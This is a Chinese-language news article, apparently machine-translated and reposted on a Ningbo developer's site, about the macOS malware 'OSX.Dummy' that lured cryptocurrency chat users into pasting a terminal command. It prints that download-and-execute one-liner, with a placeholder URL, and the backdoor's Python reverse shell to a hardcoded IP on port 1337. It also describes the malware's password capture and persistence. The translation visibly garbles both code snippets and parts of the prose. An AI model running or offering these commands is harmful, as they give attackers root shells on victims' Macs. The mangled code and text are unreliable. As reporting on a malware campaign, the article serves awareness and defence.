真正愚蠢的恶意软件使用Mac来锁定加密货币粉丝-宁波小程序开发

有人在Slack，Discord和其他社交消息平台上冒充加密货币相关讨论渠道的管理员一直试图引诱其他人安装macOS恶意软件。社交工程活动包括在讨论中发布脚本并鼓励人们将该脚本复制并粘贴到Mac上的终端窗口中。该命令下载一个巨大的（34兆字节）文件并执行它，建立一个远程连接，充当攻击者的后门。 Mac恶意软件专家帕特里克·沃德尔（Patrick Wardle）也检查了恶意软件并将其命名为“OSX.Dummy”，因为他写道：

• 感染方法很愚蠢
• 二进制的巨大规模是愚蠢的
• 持久性机制是跛脚的（因此也是愚蠢的）
• 能力是相当有限的（因此相当愚蠢）
• 在每一步检测都是微不足道的（愚蠢）
• …最后，恶意软件将用户的密码保存到dumpdummy

今天SANS的Remco Verhoef首先提到的攻击是从远程服务器下载其笨拙的有效载荷，使该文件可执行并运行它。它看起来像这样：

cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

怪物二进制文件带有一系列库，包括Open SSL库，用于加密其返回服务器的通信 – 一个在托管服务提供商CrownCloud的数据中心运行的系统。一旦执行，它就使用sudo命令使自己拥有macOS的root用户。为了实现这一点，受害者必须输入密码以允许脚本继续。该脚本将该密码存储在名为“dumpdummy”的临时文件中。该脚本还发出命令将其自身添加到启动列表中，以使macOS自身持久化。 正如Wardle所说，脚本的后门代码是一个递归的Python命令行调用，它使用端口1337进行连接的硬编码IP地址 – 一个明显的leetspeak笑话。

#!/bin/bash 同时： 做 python -c’import socket，subprocess，os; S = socket.socket（socket.AF_INET，socket.SOCK_STREAM）; s.connect（（ “185.243.115.230”，1337））; os.dup2（s.fileno（），0）; os.dup2（s.fileno（），1）; os.dup2（s.fileno（），2）; P = subprocess.call（[ “/ bin / sh的”， “ – 我”]）;” 睡5 DONE

攻击者的意图尚不清楚。但是因为所有这些都是通过终端窗口执行的，所以它绕过了MacOS的GateKeeper恶意软件保护，尽管它是未签名的代码。它使攻击者能够以受感染的Mac上的root用户身份执行命令行代码。当然，代码也必须克服受害者的常识。